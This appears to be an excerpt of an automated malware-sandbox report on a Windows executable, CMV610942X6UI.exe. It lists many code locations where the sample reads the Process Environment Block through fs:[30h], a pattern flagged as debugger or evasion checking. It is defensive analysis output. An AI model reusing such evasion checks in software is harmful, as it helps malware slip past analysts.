Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101E10E mov eax, dword ptr fs:[00000030h] 3_2_0101E10E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101E10E mov ecx, dword ptr fs:[00000030h] 3_2_0101E10E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101E10E mov eax, dword ptr fs:[00000030h] 3_2_0101E10E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101E10E mov eax, dword ptr fs:[00000030h] 3_2_0101E10E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101E10E mov ecx, dword ptr fs:[00000030h] 3_2_0101E10E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101E10E mov eax, dword ptr fs:[00000030h] 3_2_0101E10E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101E10E mov eax, dword ptr fs:[00000030h] 3_2_0101E10E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101E10E mov ecx, dword ptr fs:[00000030h] 3_2_0101E10E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101E10E mov eax, dword ptr fs:[00000030h] 3_2_0101E10E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101E10E mov ecx, dword ptr fs:[00000030h] 3_2_0101E10E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6A0E3 mov ecx, dword ptr fs:[00000030h] 3_2_00F6A0E3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01030115 mov eax, dword ptr fs:[00000030h] 3_2_01030115
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101A118 mov ecx, dword ptr fs:[00000030h] 3_2_0101A118
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101A118 mov eax, dword ptr fs:[00000030h] 3_2_0101A118
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101A118 mov eax, dword ptr fs:[00000030h] 3_2_0101A118
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101A118 mov eax, dword ptr fs:[00000030h] 3_2_0101A118
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F780E9 mov eax, dword ptr fs:[00000030h] 3_2_00F780E9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF60E0 mov eax, dword ptr fs:[00000030h] 3_2_00FF60E0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF20DE mov eax, dword ptr fs:[00000030h] 3_2_00FF20DE
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01004144 mov eax, dword ptr fs:[00000030h] 3_2_01004144
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01004144 mov eax, dword ptr fs:[00000030h] 3_2_01004144
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01004144 mov ecx, dword ptr fs:[00000030h] 3_2_01004144
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01004144 mov eax, dword ptr fs:[00000030h] 3_2_01004144
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01004144 mov eax, dword ptr fs:[00000030h] 3_2_01004144
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01008158 mov eax, dword ptr fs:[00000030h] 3_2_01008158
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7208A mov eax, dword ptr fs:[00000030h] 3_2_00F7208A
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01014180 mov eax, dword ptr fs:[00000030h] 3_2_01014180
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01014180 mov eax, dword ptr fs:[00000030h] 3_2_01014180
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0102C188 mov eax, dword ptr fs:[00000030h] 3_2_0102C188
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0102C188 mov eax, dword ptr fs:[00000030h] 3_2_0102C188
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9C073 mov eax, dword ptr fs:[00000030h] 3_2_00F9C073
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F72050 mov eax, dword ptr fs:[00000030h] 3_2_00F72050
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF6050 mov eax, dword ptr fs:[00000030h] 3_2_00FF6050
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010361C3 mov eax, dword ptr fs:[00000030h] 3_2_010361C3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010361C3 mov eax, dword ptr fs:[00000030h] 3_2_010361C3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6A020 mov eax, dword ptr fs:[00000030h] 3_2_00F6A020
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6C020 mov eax, dword ptr fs:[00000030h] 3_2_00F6C020
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010461E5 mov eax, dword ptr fs:[00000030h] 3_2_010461E5
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8E016 mov eax, dword ptr fs:[00000030h] 3_2_00F8E016
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8E016 mov eax, dword ptr fs:[00000030h] 3_2_00F8E016
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8E016 mov eax, dword ptr fs:[00000030h] 3_2_00F8E016
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8E016 mov eax, dword ptr fs:[00000030h] 3_2_00F8E016
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF4000 mov ecx, dword ptr fs:[00000030h] 3_2_00FF4000
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01012000 mov eax, dword ptr fs:[00000030h] 3_2_01012000
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01012000 mov eax, dword ptr fs:[00000030h] 3_2_01012000
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01012000 mov eax, dword ptr fs:[00000030h] 3_2_01012000
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01012000 mov eax, dword ptr fs:[00000030h] 3_2_01012000
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01012000 mov eax, dword ptr fs:[00000030h] 3_2_01012000
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01012000 mov eax, dword ptr fs:[00000030h] 3_2_01012000
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01012000 mov eax, dword ptr fs:[00000030h] 3_2_01012000
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01012000 mov eax, dword ptr fs:[00000030h] 3_2_01012000
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA01F8 mov eax, dword ptr fs:[00000030h] 3_2_00FA01F8
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEE1D0 mov eax, dword ptr fs:[00000030h] 3_2_00FEE1D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEE1D0 mov eax, dword ptr fs:[00000030h] 3_2_00FEE1D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEE1D0 mov ecx, dword ptr fs:[00000030h] 3_2_00FEE1D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEE1D0 mov eax, dword ptr fs:[00000030h] 3_2_00FEE1D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEE1D0 mov eax, dword ptr fs:[00000030h] 3_2_00FEE1D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01006030 mov eax, dword ptr fs:[00000030h] 3_2_01006030
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF019F mov eax, dword ptr fs:[00000030h] 3_2_00FF019F
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF019F mov eax, dword ptr fs:[00000030h] 3_2_00FF019F
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF019F mov eax, dword ptr fs:[00000030h] 3_2_00FF019F
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF019F mov eax, dword ptr fs:[00000030h] 3_2_00FF019F
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6A197 mov eax, dword ptr fs:[00000030h] 3_2_00F6A197
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6A197 mov eax, dword ptr fs:[00000030h] 3_2_00F6A197
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6A197 mov eax, dword ptr fs:[00000030h] 3_2_00F6A197
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB0185 mov eax, dword ptr fs:[00000030h] 3_2_00FB0185
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6C156 mov eax, dword ptr fs:[00000030h] 3_2_00F6C156
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F76154 mov eax, dword ptr fs:[00000030h] 3_2_00F76154
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F76154 mov eax, dword ptr fs:[00000030h] 3_2_00F76154
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010080A8 mov eax, dword ptr fs:[00000030h] 3_2_010080A8
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010360B8 mov eax, dword ptr fs:[00000030h] 3_2_010360B8
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010360B8 mov ecx, dword ptr fs:[00000030h] 3_2_010360B8
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA0124 mov eax, dword ptr fs:[00000030h] 3_2_00FA0124
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F802E1 mov eax, dword ptr fs:[00000030h] 3_2_00F802E1
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F802E1 mov eax, dword ptr fs:[00000030h] 3_2_00F802E1
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F802E1 mov eax, dword ptr fs:[00000030h] 3_2_00F802E1
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 3_2_00F7A2C3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 3_2_00F7A2C3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 3_2_00F7A2C3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 3_2_00F7A2C3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 3_2_00F7A2C3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103A352 mov eax, dword ptr fs:[00000030h] 3_2_0103A352
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01018350 mov ecx, dword ptr fs:[00000030h] 3_2_01018350
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F802A0 mov eax, dword ptr fs:[00000030h] 3_2_00F802A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F802A0 mov eax, dword ptr fs:[00000030h] 3_2_00F802A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF0283 mov eax, dword ptr fs:[00000030h] 3_2_00FF0283
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF0283 mov eax, dword ptr fs:[00000030h] 3_2_00FF0283
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF0283 mov eax, dword ptr fs:[00000030h] 3_2_00FF0283
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101437C mov eax, dword ptr fs:[00000030h] 3_2_0101437C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAE284 mov eax, dword ptr fs:[00000030h] 3_2_00FAE284
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAE284 mov eax, dword ptr fs:[00000030h] 3_2_00FAE284
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F74260 mov eax, dword ptr fs:[00000030h] 3_2_00F74260
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F74260 mov eax, dword ptr fs:[00000030h] 3_2_00F74260
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F74260 mov eax, dword ptr fs:[00000030h] 3_2_00F74260
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6826B mov eax, dword ptr fs:[00000030h] 3_2_00F6826B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6A250 mov eax, dword ptr fs:[00000030h] 3_2_00F6A250
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F76259 mov eax, dword ptr fs:[00000030h] 3_2_00F76259
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF8243 mov eax, dword ptr fs:[00000030h] 3_2_00FF8243
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF8243 mov ecx, dword ptr fs:[00000030h] 3_2_00FF8243
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6823B mov eax, dword ptr fs:[00000030h] 3_2_00F6823B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0102C3CD mov eax, dword ptr fs:[00000030h] 3_2_0102C3CD
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010143D4 mov eax, dword ptr fs:[00000030h] 3_2_010143D4
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010143D4 mov eax, dword ptr fs:[00000030h] 3_2_010143D4
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101E3DB mov eax, dword ptr fs:[00000030h] 3_2_0101E3DB
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101E3DB mov eax, dword ptr fs:[00000030h] 3_2_0101E3DB
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101E3DB mov ecx, dword ptr fs:[00000030h] 3_2_0101E3DB
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101E3DB mov eax, dword ptr fs:[00000030h] 3_2_0101E3DB
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA63FF mov eax, dword ptr fs:[00000030h] 3_2_00FA63FF
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8E3F0 mov eax, dword ptr fs:[00000030h] 3_2_00F8E3F0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8E3F0 mov eax, dword ptr fs:[00000030h] 3_2_00F8E3F0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8E3F0 mov eax, dword ptr fs:[00000030h] 3_2_00F8E3F0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h] 3_2_00F803E9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h] 3_2_00F803E9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h] 3_2_00F803E9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h] 3_2_00F803E9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h] 3_2_00F803E9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h] 3_2_00F803E9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h] 3_2_00F803E9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h] 3_2_00F803E9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 3_2_00F7A3C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 3_2_00F7A3C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 3_2_00F7A3C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 3_2_00F7A3C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 3_2_00F7A3C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 3_2_00F7A3C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F783C0 mov eax, dword ptr fs:[00000030h] 3_2_00F783C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F783C0 mov eax, dword ptr fs:[00000030h] 3_2_00F783C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F783C0 mov eax, dword ptr fs:[00000030h] 3_2_00F783C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F783C0 mov eax, dword ptr fs:[00000030h] 3_2_00F783C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF63C0 mov eax, dword ptr fs:[00000030h] 3_2_00FF63C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0102A250 mov eax, dword ptr fs:[00000030h] 3_2_0102A250
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0102A250 mov eax, dword ptr fs:[00000030h] 3_2_0102A250
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F68397 mov eax, dword ptr fs:[00000030h] 3_2_00F68397
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F68397 mov eax, dword ptr fs:[00000030h] 3_2_00F68397
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F68397 mov eax, dword ptr fs:[00000030h] 3_2_00F68397
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01020274 mov eax, dword ptr fs:[00000030h] 3_2_01020274
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01020274 mov eax, dword ptr fs:[00000030h] 3_2_01020274
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01020274 mov eax, dword ptr fs:[00000030h] 3_2_01020274
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01020274 mov eax, dword ptr fs:[00000030h] 3_2_01020274
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01020274 mov eax, dword ptr fs:[00000030h] 3_2_01020274
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01020274 mov eax, dword ptr fs:[00000030h] 3_2_01020274
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01020274 mov eax, dword ptr fs:[00000030h] 3_2_01020274
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01020274 mov eax, dword ptr fs:[00000030h] 3_2_01020274
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01020274 mov eax, dword ptr fs:[00000030h] 3_2_01020274
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01020274 mov eax, dword ptr fs:[00000030h] 3_2_01020274
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01020274 mov eax, dword ptr fs:[00000030h] 3_2_01020274
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01020274 mov eax, dword ptr fs:[00000030h] 3_2_01020274
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9438F mov eax, dword ptr fs:[00000030h] 3_2_00F9438F
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9438F mov eax, dword ptr fs:[00000030h] 3_2_00F9438F
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6E388 mov eax, dword ptr fs:[00000030h] 3_2_00F6E388
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6E388 mov eax, dword ptr fs:[00000030h] 3_2_00F6E388
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6E388 mov eax, dword ptr fs:[00000030h] 3_2_00F6E388
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010062A0 mov eax, dword ptr fs:[00000030h] 3_2_010062A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010062A0 mov ecx, dword ptr fs:[00000030h] 3_2_010062A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010062A0 mov eax, dword ptr fs:[00000030h] 3_2_010062A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010062A0 mov eax, dword ptr fs:[00000030h] 3_2_010062A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010062A0 mov eax, dword ptr fs:[00000030h] 3_2_010062A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010062A0 mov eax, dword ptr fs:[00000030h] 3_2_010062A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF035C mov eax, dword ptr fs:[00000030h] 3_2_00FF035C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF035C mov eax, dword ptr fs:[00000030h] 3_2_00FF035C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF035C mov eax, dword ptr fs:[00000030h] 3_2_00FF035C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF035C mov ecx, dword ptr fs:[00000030h] 3_2_00FF035C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF035C mov eax, dword ptr fs:[00000030h] 3_2_00FF035C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF035C mov eax, dword ptr fs:[00000030h] 3_2_00FF035C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h] 3_2_00FF2349
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6C310 mov ecx, dword ptr fs:[00000030h] 3_2_00F6C310
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F90310 mov ecx, dword ptr fs:[00000030h] 3_2_00F90310
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAA30B mov eax, dword ptr fs:[00000030h] 3_2_00FAA30B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAA30B mov eax, dword ptr fs:[00000030h] 3_2_00FAA30B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAA30B mov eax, dword ptr fs:[00000030h] 3_2_00FAA30B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01006500 mov eax, dword ptr fs:[00000030h] 3_2_01006500
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01044500 mov eax, dword ptr fs:[00000030h] 3_2_01044500
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01044500 mov eax, dword ptr fs:[00000030h] 3_2_01044500
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01044500 mov eax, dword ptr fs:[00000030h] 3_2_01044500
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01044500 mov eax, dword ptr fs:[00000030h] 3_2_01044500
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01044500 mov eax, dword ptr fs:[00000030h] 3_2_01044500
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01044500 mov eax, dword ptr fs:[00000030h] 3_2_01044500
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01044500 mov eax, dword ptr fs:[00000030h] 3_2_01044500
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F704E5 mov ecx, dword ptr fs:[00000030h] 3_2_00F704E5
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA44B0 mov ecx, dword ptr fs:[00000030h] 3_2_00FA44B0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FFA4B0 mov eax, dword ptr fs:[00000030h] 3_2_00FFA4B0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F764AB mov eax, dword ptr fs:[00000030h] 3_2_00F764AB
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9A470 mov eax, dword ptr fs:[00000030h] 3_2_00F9A470
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9A470 mov eax, dword ptr fs:[00000030h] 3_2_00F9A470
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9A470 mov eax, dword ptr fs:[00000030h] 3_2_00F9A470
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FFC460 mov ecx, dword ptr fs:[00000030h] 3_2_00FFC460
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9245A mov eax, dword ptr fs:[00000030h] 3_2_00F9245A
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6645D mov eax, dword ptr fs:[00000030h] 3_2_00F6645D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h] 3_2_00FAE443
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h] 3_2_00FAE443
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h] 3_2_00FAE443
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h] 3_2_00FAE443
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h] 3_2_00FAE443
